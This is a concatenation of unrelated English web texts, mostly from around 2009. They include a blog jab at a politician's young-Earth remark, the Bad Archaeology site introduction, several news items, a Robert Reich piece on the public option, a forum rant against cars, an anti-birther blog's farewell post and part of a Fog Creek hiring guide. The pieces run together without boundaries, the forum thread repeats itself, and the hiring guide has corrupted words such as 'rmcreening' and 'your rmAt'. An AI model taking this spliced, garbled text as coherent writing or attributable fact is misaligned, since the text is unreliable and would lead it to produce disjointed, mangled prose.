It 's the casual way she said it , as if she said " I had a cup of coffee today . "
From her manner , it 's clear that not only does she believe this complete and utter nonsense , but this is a simple fact woven into her mind just like the Sun is bright or chocolate is tasty .
To her , the Earth being 6000 years old just is .
Now , to be fair , this video is without context , and so we can't be absolutely sure she 's a creationist .
But it sure as heck sounds that way , and given her voting record it fits right in .
The irony , of course -- and there 's always irony when creationism is involved -- is that she 's talking about uranium mining , and it's through the radioactive decay of uranium that we know the Earth is billions of years old .
And she also praises technological achievements !
AIIIIiiiiieeee !
So while you soak that up I leave you , of course , with this :
Bad Archaeology began as part of my personal website in 1997 , back in the early days of the web .
I was joined by James Doeser as co-author in 2007 .
The name was inspired by astronomer Phil Plait ’s Bad Astronomy website ( now a blog hosted by slate.com ) .
James and I are fed up with the distorted view of the past that passes for knowledge in popular culture .
We are unhappy that books written by people with no knowledge of real archaeology dominate the shelves at respectable bookshops .
We do not appreciate news programmes that talk about ley lines ( for example ) as if they are real .
We want to show that claims about alien DNA in ancient skeletons ( for instance ) are fraudulent .
In short , we are Angry Archaeologists .
You can read the blog alongside this site .
Think of the main site as a work of reference ( but , I hope , more accurate than Wikipedia ) .
The blog is my editorial comment on news items .
Real Archaeology
Archaeology is extraordinarily diverse .
From the field technicians knee deep in mud in a Hebridean winter to the Classical specialist examining frescoes on a wall at Pompeii , from the geneticist tracing ancient bovine DNA to the linguist refining our understanding of Maya inscriptions , the range of specialisms and viewpoints is enormous .
Nevertheless , there are commonalities of approach and boundaries to that diversity , united by what may be termed ‘ the scientific method ’ .
These boundaries are best explained by showing what archaeology is not .
Someone who uses explanations that involve unknown civilisations , extraterrestrial contact , the inerrancy of religious texts or the operation of paranormal powers , belongs to a very different intellectual tradition from mainstream archaeology .
The orthodoxy – itself a mass of contradictory , competing and often abstruse arguments – generally relegates these other investigators to a ‘ fringe ’ or ‘ cult ’ status , as a result their claims go unchallenged .
We aim to explore the main strands of thought within the ‘ fringe ’ on this site .
We want to explain how and why the ideas of the ‘ fringe ’ are different from those of orthodox archaeology .
Much of what we write aims to debunking the misconceptions and distortions of the past promoted by fringe writers .
Even so , we are always open to the idea that they may be able to tell orthodox archaeology something of value .
The fringe is interesting and entertaining in its own right .
This site can only scratch the surface of such a huge area of human endeavour .
A quick look through the comments that have been made on various pages will throw up some interesting views .
In particular , you will find that our critics accuse us of arrogance , bullying , closed - mindedness , even being in the pay of governments to suppress The Truth™ .
We are none of these .
If you return to the site time and again , you will find that we update our pages when new information comes along , correcting errors that we have made .
This is something that Bad Archaeologists never do .
I ( Keith ) have received personal abuse , insults , complaints to my employer (! ) and have even been threatened with legal action over some pages and posts .
I am not put off .
We will continue to dig away , exposing Bad Archaeology wherever we find it .
WASHINGTON -- The Obama administration picked Goldman Sachs Group Inc. Vice Chairman Robert Hormats to be the State Department 's undersecretary for economic , energy and agricultural affairs , the White House announced Friday .
Mr. Hormats , if confirmed by the Senate , will buttress Secretary of State Hillary Clinton 's campaign to use economic , trade and environmental issues to redefine Washington 's relationship with nations such as China , India and Russia , said administration officials .
Mr. Hormats also will play a central role in managing Washington 's " strategic and economic dialogue " with Beijing , a diplomatic exchange overseen by Mrs. Clinton and Treasury Secretary Timothy Geithner .
The first Obama administration U.S. - China dialogue is slated for this month in Washington , according to the State Department .
Mr. Hormats " will be key in Secretary Clinton 's efforts to bring more visibility to the work of the department on economic matters , " a senior U.S. official said Friday .
Mr. Hormats said he could n't comment -- standard practice for nominees before and during the confirmation process .
Robert Reich says we have no time to waste if we want to save healthcare reform :
You know why , of course .
They do n't want a public option that would compete with private insurers and use its bargaining power to negotiate better rates with drug companies .
They argue that would be unfair .
Unfair ?
Unfair to give more people better health care at lower cost ?
To Pharma and Insurance , " unfair " is anything that undermines their profits .
I 'ved poked around Washington today , talking with friends on the Hill who confirm the worst : Big Pharma and Big Insurance are gaining ground in their campaign to kill the public option in the emerging health care bill .
As Michael Moore pointed out in " Sicko " , these companies are only doing what they supposed to do : Make money .
The real problem is having a for - profit healthcare system .
So they 're pulling out all the stops -- pushing Democrats and a handful of so - called " moderate " Republicans who say they 're in favor of a public option to support legislation that would include it in name only .
One of their proposals is to break up the public option into small pieces under multiple regional third - party administrators that would have little or no bargaining leverage .
A second is to give the public option to the states where Big Pharma and Big Insurance can easily buy off legislators and officials , as they 've been doing for years .
A third is bind the public plan to the same rules private insurers have already wangled , thereby making it impossible for the public plan to put competitive pressure on the insurers .
Is n't that sweet ?
Max Baucus , Chair of Senate Finance ( now exactly why does the Senate Finance Committee have so much say over health care ? ) has n't shown his cards but staffers tell me he 's more than happy to sign on to any one of these .
But Baucus is waiting for more support from his colleagues , and none of the three proposals has emerged as the leading candidate for those who want to kill the public option without showing they 're killing it .
Meanwhile , Ted Kennedy and his staff are still pushing for a full public option , but with Kennedy ailing , he might not be able to round up the votes .
( Kennedy 's health committee released a draft of a bill today , which contains the full public option . )
Enter Olympia Snowe .
Her move is important , not because she 's Republican ( the Senate needs only 51 votes to pass this ) but because she 's well - respected and considered non-partisan , and therefore offers some cover to Democrats who may need it .
Last night Snowe hosted a private meeting between members and staffers about a new proposal Pharma and Insurance are floating , and apparently she 's already gained the tentative support of several Democrats ( including Ron Wyden and Thomas Carper ) .
Under Snowe 's proposal , the public option would kick in years from now , but it would be triggered only if insurance companies fail to bring down healthcare costs and expand coverage in he meantime .
What 's the catch ?
First , these conditions are likely to be achieved by other pieces of the emerging legislation ; for example , computerized records will bring down costs a tad , and a mandate requiring everyone to have coverage will automatically expand coverage .
If it ever comes to it , Pharma and Insurance can argue that their mere participation fulfills their part of the bargain , so no public option will need to be triggered .
Second , as Pharma and Insurance well know , " years from now " in legislative terms means never .
There will never be a better time than now to enact a public option .
If it 's not included , in a few years the public 's attention will be elsewhere .
Much the same dynamic is occurring in the House .
Two members who had originally supported single payer told me that Pharma and Insurance have launched the same strategy there , and many House members are looking to see what happens in the Senate .
Snowe 's " trigger " is already buzzing among members .
All this will be decided within days or weeks .
And once those who want to kill the public option without their fingerprints on the murder weapon begin to agree on a proposal -- Snowe 's " trigger " or any other -- the public option will be very hard to revive .
The White House must now insist on a genuine public option .
And you , dear reader , must insist as well .
This is it , folks .
The concrete is being mixed and about to be poured .
And after it 's poured and hardens , universal health care will be with us for years to come in whatever form it now takes .
Let your representative and senators know you want a public option without conditions or triggers -- one that gives the public insurer bargaining leverage over drug companies , and pushes insurers to do what they 've promised to do .
Do n't wait until the concrete hardens and we 've lost this battle .
Washington , DC — The oil and gas that fuels our homes and cars started out as living organisms that died , were compressed , and heated under heavy layers of sediments in the Earth 's crust .
Scientists have debated for years whether some of these hydrocarbons could also have been created deeper in the Earth and formed without organic matter .
Now for the first time , scientists have found that ethane and heavier hydrocarbons can be synthesized under the pressure - temperature conditions of the upper mantle — the layer of Earth under the crust and on top of the core .
The research was conducted by scientists at the Carnegie Institution 's Geophysical Laboratory , with colleagues from Russia and Sweden , and is published in the July 26 , advanced on - line issue of Nature Geoscience .
Methane ( CH4 ) is the main constituent of natural gas , while ethane ( C2H6 ) is used as a petrochemical feedstock .
Both of these hydrocarbons , and others associated with fuel , are called saturated hydrocarbons because they have simple , single bonds and are saturated with hydrogen .
Using a diamond anvil cell and a laser heat source , the scientists first subjected methane to pressures exceeding 20 thousand times the atmospheric pressure at sea level and temperatures ranging from 1,300 F° to over 2,240 F° .
These conditions mimic those found 40 to 95 miles deep inside the Earth .
The methane reacted and formed ethane , propane , butane , molecular hydrogen , and graphite .
The scientists then subjected ethane to the same conditions and it produced methane .
The transformations suggest heavier hydrocarbons could exist deep down .
The reversibility implies that the synthesis of saturated hydrocarbons is thermodynamically controlled and does not require organic matter .
The scientists ruled out the possibility that catalysts used as part of the experimental apparatus were at work , but they acknowledge that catalysts could be involved in the deep Earth with its mix of compounds .
This artistic view of the Earth 's interior shows hydrocarbons forming in the upper mantle and transported through deep faults to shallower depths in the Earth 's crust .
The inset shows a snapshot of the methane dissociation reaction studied in this work .
( Photo Credit : Image courtesy A. Kolesnikov and V. Kutcherov )
" We were intrigued by previous experiments and theoretical predictions , " remarked Carnegie 's Alexander Goncharov a coauthor .
" Experiments reported some years ago subjected methane to high pressures and temperatures and found that heavier hydrocarbons formed from methane under very similar pressure and temperature conditions .
However , the molecules could not be identified and a distribution was likely .
We overcame this problem with our improved laser - heating technique where we could cook larger volumes more uniformly .
And we found that methane can be produced from ethane . "
The hydrocarbon products did not change for many hours , but the tell - tale chemical signatures began to fade after a few days .
Professor Kutcherov , a coauthor , put the finding into context : " The notion that hydrocarbons generated in the mantle migrate into the Earth 's crust and contribute to oil - and - gas reservoirs was promoted in Russia and Ukraine many years ago .
The synthesis and stability of the compounds studied here as well as heavier hydrocarbons over the full range of conditions within the Earth 's mantle now need to be explored .
In addition , the extent to which this ' reduced ' carbon survives migration into the crust needs to be established ( e.g. , without being oxidized to CO2 ) .
These and related questions demonstrate the need for a new experimental and theoretical program to study the fate of carbon in the deep Earth . "
Source : Carnegie Institution
Recognize the yard sale shopper ?
Maybe it 's funnier if you do n't .
Like at an all - you - can - eat buffet , wait til the end for the good stuff .
The version of the FY2010 Appropriations Bill currently in the House of Representatives would lift a number of reproductive justice - related funding bans in Washington , DC .
Crossposted at Choice Words .
The version of the FY2010 Appropriations Bill currently in the House of Representatives would lift a number of reproductive justice - related funding bans in Washington , DC .
Congress has supreme authority over the District and conservative
Republicans in Congress have used this power to enact a number of bans
on funding related to so - called social issues .
In a statement
Congressman José E. Serrano , Chairman of the House Appropriations
Subcommittee on Financial Services and General Government , said the
bill takes steps to reduce “ undue congressional interference in local
affairs and [ eliminate ] restrictions on the District that do not apply
to other parts of the nation . ”
The statement lists a number of funding
bans that could be lifted :
Sex .
Abortion .
Parenthood .
Power .
The latest news , delivered straight to your inbox .
SUBSCRIBE
The bill eliminates the special prohibition on use on
locally raised funds for abortion — thereby placing the District in the
same position as each of the 50 states in that regard .
The measure also
discontinues the ban on use of funds for domestic partnership
registration and benefits and the ban on use of funds for needle
exchange programs , and allows the District to conduct and implement a
referendum on use of marijuana for medical purposes as has been done in
various states .
Access to abortion in DC has been severely limited by anti-choice
Congresspeople playing politics with the District .
The AIDS epidemic
has had a devastating impact in DC , where the rate of new cases is 12 times the national average .
DC has a large queer population and leans to the left politically , but
federal funds for domestic partners are still restricted .
The Appropriations process could continue in Congress until October ,
so the fight to lift these funding bans is jut beginning .
But after
years of a conservative Congress and President putting the health and
lives of DC residents in danger this is an important first step towards
protecting reproductive and sexual health in the U.S. capital .
Read Courage to Try II : GERMAN TRANSLATION - Lesbische Fantasie ( First Time Pleasures 2 ) Nook Google eBookstore Read Courage to Tr ...
A polar bear mezzed with me once .... ................... Once .....
Share Tweet Stumble Pin It Email
Beerina Sarcastic Conqueror of Notions
Join Date : Mar 2004 Posts : 30,119
latent aaaack Originally Posted by
1. 40,000 car deaths in the US every year .
2. 500,000 deaths in the US from cardiopulmonary disease linked to breathing fine particle air pollution .
If cars are responsible for even 1/5 of that pollution then that 's another yearly 100,000 deaths traced to this invention .
Also for those that do n't die , they are a big reason why 60 % of Americans live in areas where the air is dirty enough to endanger lives and moreover , I can only assume , be a noticeable effect on quality of life ( that is , if a dirty - air breather knew what they 're missing ) .
sources for that :
http://www.sciencedaily.com/releases...0429131158.htm
http://www.eurekalert.org/pub_releas...-nda072308.php
Plus note some of the headlines linked to from that Science Daily article :
Traffic Exhaust Can Cause Asthma , Allergies And Impaired Respiratory Function In Children
Air Pollution Shrinks Fetus Size , Study Suggests
Air Pollution Linked To Premature Birth In Pregnant Women
Americans Owe Five Months Of Their Lives To Cleaner Air
3 . Cars are a major reason suburbia exists [ shudder ] .
This also leads to the next point .
4 . Cars are a major reason urban sprawl exists and contribute to the decay of urban centers .
5 . Cars , compared to bicycle or feet , are noisy , smelly , and make populated areas feel more dehumanizing and depersonalizing compared to areas where people walk or bike .
6 . People act like animals when driving cars - based on first hand observation they are far more likely to act selfish , upset , and aggressive compared to when those same people are n't driving and compared to walkers and bicyclists .
Plus scientists have lent credence to the obvious fact that this highly impersonal and competitive activity brings out the animal in us .
http://articles.latimes.com/2006/feb...e-territorial6
7 .
8. Cars contribute to global warming .
9 . Cars are a substantial cause of high obesity rates , and thus more preventable deaths and societal costs from disease .
10 .
Car culture and infrastructure has left the US , for one , highly vulnerable to oil shocks and ' peak oil ' if you believe that 's a threat .
11 . US military deaths from Vietnam and WW2 combined equal about 500,000 , a death toll replicated about every 5 years in America because of cars and affecting , not military personnel , but ordinary men , women , and children .
It 's insane to react with horror and disapproval at perceived ' unjust ' wars or wars that you wish somehow were n't necessary to begin with when the same situation , on a greater scale and often for less justifiable , rational reasons exists with the large scale effects of individuals ' choice to use cars .
So , might it all be worth it ?
Pros :
1. They enable faster emergency services response times .
( sick irony )
2. Faster mail service .
( oh joy ! )
3 . They enable commercial trucking , which gives us a greater range of products to buy and indirectly make us all a little richer by beneficial effect on overall economy .
4 . They make it easier to travel to remote wilderness and / or recreational areas .
5 . They make it so you do n't have to live near where you work which increases employment opportunities .
6 . Lack of a moon buggy would 've made it harder to rub it in to the Soviets .
So there you have it - if a Terminator - like time traveler went back in time to assassinate anyone attempting to invent a car the net result would be millions of lives saved and a more intact fabric of society - but we'd have less products to choose from .
Am I wrong ?
Some things were only invented because their inventors were smart enough to solve an immediate problem but too dumb to be able to predict its long term effects .
Anyway , to give my thread some kind of argument to defend - in my opinion people should vote to gradually ban and shift away from the reliance on personal automobiles except for emergency services and commercial trucking but they are too uninformed and illogical to .
Cons : 1. 40,000 car deaths in the US every year .
2. 500,000 deaths in the US from cardiopulmonary disease linked to breathing fine particle air pollution .
If cars are responsible for even 1/5 of that pollution then that 's another yearly 100,000 deaths traced to this invention .
Also for those that do n't die , they are a big reason why 60 % of Americans live in areas where the air is dirty enough to endanger lives and moreover , I can only assume , be a noticeable effect on quality of life ( that is , if a dirty - air breather knew what they 're missing ) .
sources for that :
Plus note some of the headlines linked to from that Science Daily article : 3 .
Cars are a major reason suburbia exists [ shudder ] .
This also leads to the next point .
4 . Cars are a major reason urban sprawl exists and contribute to the decay of urban centers .
5 . Cars , compared to bicycle or feet , are noisy , smelly , and make populated areas feel more dehumanizing and depersonalizing compared to areas where people walk or bike .
6 .
People act like animals when driving cars - based on first hand observation they are far more likely to act selfish , upset , and aggressive compared to when those same people are n't driving and compared to walkers and bicyclists .
Plus scientists have lent credence to the obvious fact that this highly impersonal and competitive activity brings out the animal in us .
7 .
http://en.wikipedia.org/wiki/Cars#Environmental_impact
8 . Cars contribute to global warming .
9 . Cars are a substantial cause of high obesity rates , and thus more preventable deaths and societal costs from disease .
10 .
Car culture and infrastructure has left the US , for one , highly vulnerable to oil shocks and ' peak oil ' if you believe that 's a threat .
11 . US military deaths from Vietnam and WW2 combined equal about 500,000 , a death toll replicated about every 5 years in America because of cars and affecting , not military personnel , but ordinary men , women , and children .
It 's insane to react with horror and disapproval at perceived ' unjust ' wars or wars that you wish somehow were n't necessary to begin with when the same situation , on a greater scale and often for less justifiable , rational reasons exists with the large scale effects of individuals ' choice to use cars .
So , might it all be worth it ?
Pros : 1 . They enable faster emergency services response times .
( sick irony ) 2 .
Faster mail service .
( oh joy ! ) 3 .
They enable commercial trucking , which gives us a greater range of products to buy and indirectly make us all a little richer by beneficial effect on overall economy .
4 .
They make it easier to travel to remote wilderness and / or recreational areas .
5 .
They make it so you do n't have to live near where you work which increases employment opportunities .
6 .
Lack of a moon buggy would 've made it harder to rub it in to the Soviets .
So there you have it - if a Terminator - like time traveler went back in time to assassinate anyone attempting to invent a car the net result would be millions of lives saved and a more intact fabric of society - but we'd have less products to choose from .
Am I wrong ?
Some things were only invented because their inventors were smart enough to solve an immediate problem but too dumb to be able to predict its long term effects .
Anyway , to give my thread some kind of argument to defend - in my opinion people should vote to gradually ban and shift away from the reliance on personal automobiles except for emergency services and commercial trucking but they are too uninformed and illogical to .
Hmmm .
I wonder what the death rates are in countries where the government outlaws cars , or where the government is so intrusive that essentially no domestic industry exists in spite of inviolate importation laws ?
Oop , I forgot .
This is about the fantasy of having your cake and eating it too .
Where some " fine tuned " law helps capitalism along , in our minds , rather than hindering it , out in reality .
Hmmm .
I wonder what the death rates are in countries where the government outlaws cars , or where the government is so intrusive that essentially no domestic industry exists in spite of inviolate importation laws ?
Oop , I forgot .
This is about the fantasy of having your cake and eating it too .
Where some " fine tuned " law helps capitalism along , in our minds , rather than hindering it , out in reality .
Barack Obama and I have 8 years to look back on —he looking at the important issues of our time — I looking back on the Birthers .
Somehow I think I got the short end of the stick !
Some people have the gift of being gracious .
I ’m not one of them .
If you are n’t lifted to the heights by the remarks that follow , just attribute it to my lack of skill , not a lack of feeling .
I want to thank a vibrant online community who helped make this blog fun , those who put a face on some of those 30,000 monthly visitors at our blog ’s peak , who encouraged me , who caught my mistakes , who contributed ideas for stories , who did significant research , and who kept me honest .
I wo n’t mention individuals because there are simply too many of them .
Just look around .
I consider you all friends .
As for the Birthers , while this blog would be nothing without them , I will not thank them and those who , with whatever motives , incited them .
They are a blot on our country ’s history and we would all have been better off without their activity .
Even so , this blog is its silver lining .
I want to thank several bloggers and to recognize their work .
John Woodman did careful and well - documented research both into birther claims about Obama ’s birth certificate , but also the legal basis for some of their other ideas .
He not only blogged about it , but published a book .
Presidential candidate Loren Collins did some fantastic research into lies about the President ’s parentage and into the origins of the birthers , making his case like the attorney he is .
Loren also has an excellent book entitled Bullspotting : Finding Facts in the Age of Misinformation of considerable value in this age of “ fake news . ”
Reality Check had a wonderful radio show ( check out the podcasts ) with significant topical guests , and his blog still has interesting new content in these latter days of the Birther Movement .
RC ’s anonymity stood as testimony to the incompetence of birther investigation , and he researched and popularized the debunking of the Cold Case Posse using a Xerox machine .
I want to recognize and thank Tes for her compilation of birther lawsuits and the evidence in the Melendres case , something I think will continue to be a valuable resource in the future .
Tes also wrote some early guest articles here .
I value having her as a friend .
( There are many more bloggers of note . )
The anonymous ( but not to me ) Jack Ryan created and published a massive and invaluable collection of documents concerning the birther lawsuits that I relied upon every week .
A special shout out goes to Bill Bryan who more than anyone I think , helped to build the anti-birther community .
Bill got folks to show up at events , something the Birthers could n’t do .
Bill was a role model of courage in the face of birther threats and his personal story of triumph over adversity is an inspiration .
The Fogbow is the place to be when it comes to combatting right - wing nuttery .
I want to acknowledge a few Birthers for being brave enough to put forwards ideas on this blog and say around to defend them the best they could , in particular Jerry Collette , and Bob Gard .
I want to acknowledge Bryan Reilly for having the rare gift among Birthers , the ability to look at the facts and change his mind , and it ’s certainly a big deal that he chose to publish his articles here .
Last , but hardly least , I want to think my wife Ms. Conspiracy for putting up with all of this .
We married a year before the Obama Conspiracy stuff got started .
She has tolerated me spending long hours at the keyboard , and listened to countless narratives on what the Birthers are up to .
She has a good working knowledge of the topic , even though she never reads the blog .
[ Update : she read its last two entries . ]
So ultimately , who won ?
“ Birther ” is now a term of derision in the English vocabulary .
Barack Obama was elected twice and served two full terms .
He was not impeached .
There were no Congressional investigations of his identity documents .
His approval rating upon leaving office is phenomenal .
Birthers lost 226 lawsuits .
Still , the country took a turn for the crazy over the last 8 years .
A turncoat Birther was even elected president .
I think it ’s too soon to count winners and losers .
Thomas Jefferson probably did not say “ the price of liberty is eternal vigilance , ” but it ’s a good idea .
I challenge each of you , current readers , or those who come after this blog has long closed down to new articles : stay vigilant , check the facts , know your biases , and do n’t tell lies .
The truth will set you free .
PS : This article is set to auto - publish at noon tomorrow ( January 20 ) .
At that time I will be presiding over a meeting of my local Civitan club whose motto is “ Builders of good citizenship , ” where I and our membership will together pledge allegiance to the flag of the United States of America .
Never let the fake news crowd claim the mantle of patriotism .
There is nothing patriotic about smears and character assassination .
CAMBRIDGE , Mass . 
The woman who called 911 to report a possible breaking and entering at the home of Prof.
Henry Louis Gates Jr. told the dispatcher that she had “ no idea ” if the two men she saw were breaking in and said that , in fact , they might live there .
A recording of the call , released on Monday by the Cambridge Police Department , raised new questions about the case , which ended in the arrest on July 16 of Professor Gates , a prominent Harvard scholar , on a disorderly conduct charge .
The charge was later dropped .
The caller , Lucia Whalen , told the dispatcher she was calling on behalf of an older woman who lived on the street and had seen the men  who turned out to be Professor Gates and his cabdriver  forcing their way into the home .
Police officials have said the older woman had just moved into the neighborhood .
Ms. Whalen , 40 , works on the block .
“ They kind of had to barge in , and they broke the screen door and they finally got in , ” Ms. Whalen said on the recording , adding that she had also seen two suitcases on the porch .
In April , the Pirate Bay team Fredrik Neij , Gottfrid Svartholm Warg and Peter Sunde were found guilty of assisting in copyright infringement , along with Carl Lundström , who was convicted of funding the five - year - old operation .
They each were sentenced to a year in prison and $ 3.8 million in fines .
Despite the ruling , the four were confident it would be at least another year before any of them would actually have to face prison or the coughing up of cash .
The verdict triggered a political backlash among Swedish youth , and the Swedish Pirate Party more than doubled in size to 40,000 - plus members .
Two weeks ago , the party won a seat in the European Parliament .
The Pirate Bay defendants charged Judge Tomas Norström with bias , due to his membership of the Swedish Copyright Association , and asked a court of appeal for a completely new trial with a different judge .
Today however , the door was firmly shut on The Pirate Bay .
The court concluded :
“ The Court of Appeal has come to the conclusion that none of the circumstances set out , individually or taken together , means that there are legitimate doubts about the judge ’s impartiality in this case .
There has not been any bias , ” .
For now , The Pirate Bay will keep operating as usual .
One of the defendants Peter Kolmisoppi Sunde has just tweeted : “ The Pirate Bay will now file charges against Sweden for violation for Human Rights .
Read next : If Internet Commenters Had Their Own Magazine
We remarked after Goldman Sachs ( GS ) came out with earnings , that analysts were already pestering the company about its mere 14 x leverage ratio , wondering when they might start to get more aggressive -- this after the financial system nearly collapsed due to too much leverage .
Nobody 's learned anything .
Felix Salmon points to this hilarious statement on one of Harvard Business School 's blog regarding Google 's earnings :
It would not be rational for a public company to be funded only by equity .
It ’s too inefficient .
Debt is a lower cost source of funds and allows a higher return to the equity investors by leveraging their money …
Back to Google .
It ’s a nearly $ 22 billion company with no debt , which is inefficient .
The problem for Google is that their cash flow and profit are so strong that they can finance the business with retained earnings .
But I predict that as Google matures and growth slows , debt will become an important source of funding .
Yes , you can never be too rich , too thin or too leveraged , at least in the minds of our highly - trained financial geniuses .
No matter what the environment , analysts are always pestering the companies are doing about buybacks or dividends ( up , please ! ) .
We were at a media banking conference in early 2008 (! ) and we heard companies being asked about their buyback strategy .
Heck -- just to give you a sense of how thoroughly colonized the financial industry mind is -- even Meredith Whitney , who to her credit is pretty keenly attuned to the problems of the industry , asked Goldman Sachs a question about their stock buyback schedule .
And she 's long - term bearish ( still ) on the industry !
Almost nobody is innocent here .
Management spent the years before the bust doing share buybacks at a crazy pace , proving that they 're horrible traders of their own stock .
Activist investors without any real ideas tried their best to oust management that did n't get with the program of leverage .
And here we are in July , 2009 and HBS students are being told that Google ( Google ! ) ought to be borrowing more to finance itself .
We 're officially getting nowhere .
Naipu , Romania : A woman stands in front of the graves of her relatives at a cemetery .
Orthodox women go to cemeteries early on Maundy Thursday to light candles , burn incense and mourn their dead relatives as part of a southern Romania tradition
Photograph : Bogdan Cristel / Reuters
Illustration by Claudio Munoz
ONCE it claimed to have more English speakers than all but two other countries , and it has exported millions of them .
But these days Filipinos are less boastful .
Three decades of decline in the share of Filipinos who speak the language , and the deteriorating proficiency of those who can manage some English , have eroded one of the country 's advantages in the global economy .
This week children trooped back to school for the new academic year .
The government - approved textbooks they will study illustrate the problem .
A passage in one for eight - year - olds reads : “ The dog rolled on the floor so fast and fell on the ground .
There he laid yelling louder than ever .
The dog yelled on top of his voice . ”
A book for 11 - year - olds advises , mysteriously : “ Just remember this acronym — DOCSiShQACNMN — to make it easy for you to remember the order of adjectives in a series . ”
Never mind the pupils , teachers have been flunking English for years .
In 2004 only one in five teachers passed the English - proficiency test .
The effect on pupils is plain to hear .
Last year the country winced when the 17 - year - old winner of the Miss Philippines World beauty contest failed spectacularly to answer in English the usual questions posed by judges in such events .
Call - centres complain that they reject nine - tenths of otherwise qualified job applicants , mostly college graduates , because of their poor command of English .
This is lowering the chances that the outsourcing industry will succeed in its effort to employ close to 1 m people , account for 8.5 % of GDP and have 10 % of the world market by the end of 2010 .
America , as the colonial power , brought English and universal public education to the Philippines a century ago .
But English as a subject has suffered from lack of money , along with public education as a whole .
Some Filipinos also blame the introduction in the 1970s of Filipino , an artificial national language , as the medium of instruction .
The government is tackling the problem by throwing money at remedial English - language instruction for teachers and making greater use of English as the medium of instruction .
It says these measures are working .
A recent opinion poll suggests Filipinos believe their own ability to speak English is improving .
Call - centre bosses are not convinced .
Posted July 16 , 2009
This is the first installment of a series on how to get a job at Fog Creek Software ( and other selective software companies ) .
Disclaimer :
This article is based on my own personal experiences and preferences in hiring and does not necessarily reflect Fog Creek 's official policies .
As such , it is meant as a helpful guide .
Reading this article will not entitle you to a job .
And of course : Fog Creek Software , Inc. does not discriminate in employment matters on the basis of race , color , religion , gender , national origin , age , military service eligibility , veteran status , sexual orientation , marital status , disability , or any other protected class .
My last two articles discussed , if somewhat briefly , why a cover letter is important in our hiring process at Fog Creek .
The intent of those articles was to provide a peek into our hiring process ; an idea of what we look for and why we find it useful when screening applications .
I was surprised at the negativity of some of the responses .
Perhaps I was too brief .
In the interests of providing constructive criticism and some guidance to all of the commentors that [ voiced uncertainty ] ( http://www.reddit.com/r/programming/comments/8yn6h/reddits_entitlement_comple x/c0aujqy ) about what to write in a cover letter , I 'd like to start a series called " How to Get Hired at Fog Creek ( and Other Selective Software Companies ) " .
This is part one of the series : Rmand Cover Letters .
As I 've mentioned several times now , our rmcreening process is broken down into seven areas , as outlined in Joel 's article : Passion , Pickiness , English , Brains , Selectivity , Hardcore , and Diversity .
I 'll talk about each , and what candidates can do to best demonstrate themselves in their applications .
Also , before I begin , I have to say that I would n't be talking about any of this if I thought this information would allow people to game the system .
I 've spent almost four years using these guidelines to evaluate applicants , and I 've come to believe that they probably are as objective as you can get with the information available at the beginning of an application process .
To game the system , a candidate would have to outright lie about many facets of their background and experience .
The only real problem I see with it is that a strong candidate who does not submit a quality application may be passed over .
Hopefully this will help .
General Guidelines
Résumé :
Your résumé should be a concise summary of who you are as an applicant .
It
should have the following sections :
Experience : List each of your past , relevant jobs .
Include the company name , your title , your start and end dates , and a short list of responsibilities and accomplishments .
Some people say that you should write in a particular style for this section .
Just make sure you do n't get too choppy .
Full English sentences are almost always better .
Education :
For each college or university you 've attended , list the school 's name , location , dates of graduation or expected graduation , major , relevant minors , and GPA .
Do n't include high school .
Extras : Software developers often list their competencies in various languages .
While we do n't screen for specific languages , it can be useful .
Just make sure you 're honest ; if you say you are an expert in C , we 'll expect you to show it in the interviews .
Other extras might include such details as honors received , activities you participate in , or groups that you belong to .
They may not affect a hiring decision much , but it 'll help me get an idea of who you are .
Try to keep your rmo one page .
If you have a lot of experience , going to two pages is acceptable .
Three or more pages is overkill , and it usually means you 're including things on your rmhat would be better off in your cover letter .
Cover Letter
Your cover letter is where you round out your application and fill in any holes that might be missing on your rmAt the very least , it should explain which position you 're applying for , why you 're applying for it , and why you would be a good fit .
You should n't suck up ; instead , take the opportunity to clarify and elaborate on yourself as a candidate .
I 'll talk more about specifics below .
Application
If you 're submitting your application via email , your cover letter should be the body of the email , with your rms an attachment .
I personally do n't have a problem with receiving rmas Word documents , but some people do .
If possible , send a PDF version .
It 's more universal , does n't require that the recipient has the latest version of Office , and generally looks more professional .
A link to a well - formatted HTML version is also OK , just do n't attach an HTML file to an email .
Specific Criteria
We screen applications using the seven guidelines below .
Generally , you need to fulfill five of the seven to pass the screening , but we provide plenty of latitude for applicants who show they are smart and get things done .
In the four years I 've been involved in hiring , I can only think of one or two applicants that have met all seven , so do n't worry if you are missing a couple .
Passion
For me , passion is far and away the most important attribute a candidate can show .
Every single developer at Fog Creek is immensely passionate about making software .
Almost everyone is working on a side - project or two , learning new languages , contributing to StackOverflow .
I want to see that same sort of passion from candidates .
This is probably where the cover letter is most beneficial .
Use it as an opportunity to brag about what you 've done , especially about things you did outside of work or school .
Open source software , Flash games , your own blog software , anything .
What if you were too busy at work to do side projects ?
Then tell me what had you so engrossed at work .
Besides showing me that you 're passionate about software , a good set of side projects show me that you know what you 're doing , especially for younger , less experienced candidates .
A long running side project is a great way to learn about making real software .
Most college and internship projects are too short to really learn about the full process of creating software .
Write something , then spend at least a year maintaining and improving it .
Even better , get other people to use it , fix bugs , and keep your users happy and coming back .
Pickiness
This is the other aspect where a well - written cover letter is really the only way to show that you 're being picky about which companies you 're applying to .
We 're not looking for you to suck up to us ; in fact , sucking up is considered a negative .
We just want to know that if we go through all the trouble of spending numerous developer hours screening and interviewing you , and thousands of dollars flying you out and putting you up in a nice Manhattan hotel , that you 'll be likely to take the job if we offer you one .
Hiring is expensive , and screening for pickiness helps us make sure that those dollars are spent most effectively .
The easiest way to show that you 're selective about who you apply to is to tell us a little bit about why you 're applying .
What about the company makes you want to work there ?
Is there a particular product that interests you , something about the company culture that makes you think it 's the right place for you ?
Do n't exaggerate ; " I want to work for your company because it is the best company ever " will not get bonus points .
Just be honest .
I 'm genuinely interested in why you 're applying .
Also , do some research on the company .
I do n't expect people to have read the entire Joel on Software archives , but you should have a basic idea of what products a company makes before applying .
My previous articles got some push - back on this point .
Some people told me that for them , a job is just a job , but that should n't be grounds for screening them out .
Personally , I disagree .
If you want to work for selective companies , it has to be about more than just the paycheck .
English
A lot of software development is about communication .
We want to hire candidates with strong communication skills , specifically in English .
The easiest way to score points here is to make sure your cover letter is written well .
Proof - read it a few times , then get a friend to read it over .
A well - written cover letter stands out , but a poorly written one stands out even more .
Too many errors and you 'll be immediately disqualified .
There 's nothing worse than getting an application that says " Great comunication skills " .
Brains
You 've got to be smart .
The easiest way to show off your brains is to have had good grades in school .
Just put your GPA on your resume and you 're done .
Good work !
Of course , that 's not the only way to demonstrate your intelligence .
I know many incredibly smart people who just did n't do well in school .
